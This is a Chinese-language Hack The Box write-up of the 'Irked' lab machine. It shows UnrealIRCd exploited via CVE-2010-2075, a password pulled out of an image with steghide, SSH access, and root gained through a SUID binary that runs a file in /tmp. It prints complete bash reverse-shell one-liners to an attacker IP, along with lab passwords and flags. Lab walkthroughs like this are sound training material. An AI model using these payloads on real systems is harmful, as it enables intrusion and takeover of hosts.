Irked-htb-writeup

0x00 靶场技能介绍

章节技能:隐写术、irc服务、CVE-2010-2075、steghide工具使用、SUID提权

参考链接:https://www.jgeek.cn/article/73

参考链接:https://www.tagnull.de/post/irked/

0x01 用户权限获取

1、常规流程,获取下靶机IP地址:10.10.10.117

2、使用我们 htb-portscan.sh 小脚本跑下端口,冗余的信息,我就不展示了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(kali㉿kali-linux-2022-2)-[~/Desktop/HTB-Tools-Kali/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.117 tcp
开始对 10.10.10.117 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.117" -oG "10.10.10.117"-tcp-braker-allports

* 正在对开放的端口进行TCP全连接式版本探测和系统版本探测...
sudo nmap -sT -sV -O -p"22,80,111,6697,8067,54143,65534," "10.10.10.117"
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
54143/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)

* 正在对开放的端口进行nmap漏洞脚本脚本扫描...
sudo nmap --script=vuln -p"22,80,111,6697,8067,54143,65534," "10.10.10.117"
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| irc-botnet-channels: 
|_  ERROR: Closing Link: [10.10.14.7] (Too many unknown connections from your IP)
8067/tcp  open  infi-async
| irc-botnet-channels: 
|_  ERROR: Closing Link: [10.10.14.7] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
54143/tcp open  unknown
65534/tcp open  unknown

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/HTB-Tools-Kali/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.117 udp
开始对 10.10.10.117 进行nmap端口扫描...
* 正在执行udp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- -sU "10.10.10.117" -oG "10.10.10.117"-udp-braker-allports

* 正在对开放的端口进行udp式版本探测和系统版本探测...
sudo nmap -sV -sU -O -p"111,5353,56188," "10.10.10.117"
PORT      STATE SERVICE VERSION
111/udp   open  rpcbind 2-4 (RPC #100000)
5353/udp  open  mdns    DNS-based service discovery
56188/udp open  status  1 (RPC #100024)

3、整体看下来获取的信息还是比较多的,比较特别的一些信息就是6697、8067、65534开放的irc服务信息了。

IRC介绍-维基百科

IRC(英语:Internet Relay Chat,直译:因特网中继聊天)是一种应用层协议。其主要用于群体聊天,但同样也可以用于个人对个人的聊天。IRC使用的服务器端口有6667(明文传输,如irc://irc.libera.chat)、6697(SSL加密传输,如ircs://irc.libera.chat:6697)等。

UnrealIRCd-维基百科

UnrealIRCd是一个开源IRC守护进程,最初基于 DreamForge,可用于类 Unix 操作系统和Windows 。自1999 年 5 月 UnrealIRCd 开始开发以来添加和修改了许多新功能,包括高级安全功能和错误修复,现在是流行的服务进程。

IRC服务搭建过程:https://blog.logc.icu/post/2019-12-212247/

4、整体看来这个,这个应该是一个服务,用于聊天使用。

5、使用谷歌搜索 unrealircd exploit github发现了CVE-2010-2075 漏洞,不管存不存在,下载下来打一下看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/CVE-2010-2075-UnrealIRCd-3.2.8.1]
└─$ python3 CVE-2010-2075.py -t 10.10.10.117 -p 6697 -c 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10086 0>&1"'
Creating connection
Creating payload
[*]Sending Payload...

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.117] 55175
bash: cannot set terminal process group (623): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$

6、这里我们成功的获取到了ircd用户的权限,通过查看 /home 目录,发现其实还有其他用户

1
2
3
4
5
6
7
8
ircd@irked:~/Unreal3.2$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root     root     4096 Sep  5  2022 .
drwxr-xr-x 21 root     root     4096 Sep  8  2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 djmardov
drwxr-xr-x  3 ircd     root     4096 Sep  5  2022 ircd
ircd@irked:~/Unreal3.2$

7、通过使用 LinEnum 发现了一个密码文件,暂时存放,因为这个密码ssh也登录不了服务器。

1
2
3
4
5
6
7
8
9
10
11
12
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 12
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
lrwxrwxrwx  1 root     root       23 Sep  5  2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$

8、回到一开始的80端口,首页是一个图片,还提醒irc服务,其实这个图片是一个隐写图片

9、使用steghide工具和上面的密码,成功解压出来一个pass.txt文件

1
2
3
4
5
6
7
8
┌──(kali㉿kali-linux-2022-2)-[~/Desktop/111]
└─$ steghide extract -sf irked.jpg
Enter passphrase: 
wrote extracted data to "pass.txt".

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/111]
└─$ cat pass.txt 
Kab6h+m+bbp2J:HG

10、该密码就是 djmardov 的密码,接下里ssh登录获取到第一个user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cd /home/djmardov
djmardov@irked:~$ cat user.txt
7b6ddb112f82170596288b71e663b43d
djmardov@irked:~$

0x02 系统权限获取

11、继续使用 linpeas 枚举 ,发现了631端口的一个服务,使用下列命令在本机kali进行端口映射转发,实际上看了看也没啥东西,作为一个技能学习吧

1
sshpass -p 'Kab6h+m+bbp2J:HG' ssh djmardov@10.10.10.117 -L 1337:127.0.0.1:631

12、通过 linpeas,发现存在一个 SUID 权限的命令 /usr/bin/viewuser ,运行尝试发现突破口

1
2
3
4
5
6
7
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-12-06 04:18 (:0)
djmardov pts/0        2023-12-06 04:39 (10.10.14.7)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$

13、这里往这个文件里写一个反弹shell来获取下看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"' > /tmp/listusers

djmardov@irked:~$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"' > /tmp/listusers
djmardov@irked:~$ cat /tmp/listusers
bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-12-06 04:18 (:0)
djmardov pts/0        2023-12-06 04:39 (10.10.14.7)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-12-06 04:18 (:0)
djmardov pts/0        2023-12-06 04:39 (10.10.14.7)

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10010
listening on [any] 10010 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.117] 52127
root@irked:~# 

root@irked:~# id
id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# cat /root/root.txt
cat /root/root.txt
7250dbb58e1059d4c5400136e3810589
root@irked:~#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/163

打靶记
#shooting-range
Irked-htb-writeup
https://sh1yan.top/2023/12/06/Irked-htb-writeup/
作者
shiyan
发布于
2023年12月6日
许可协议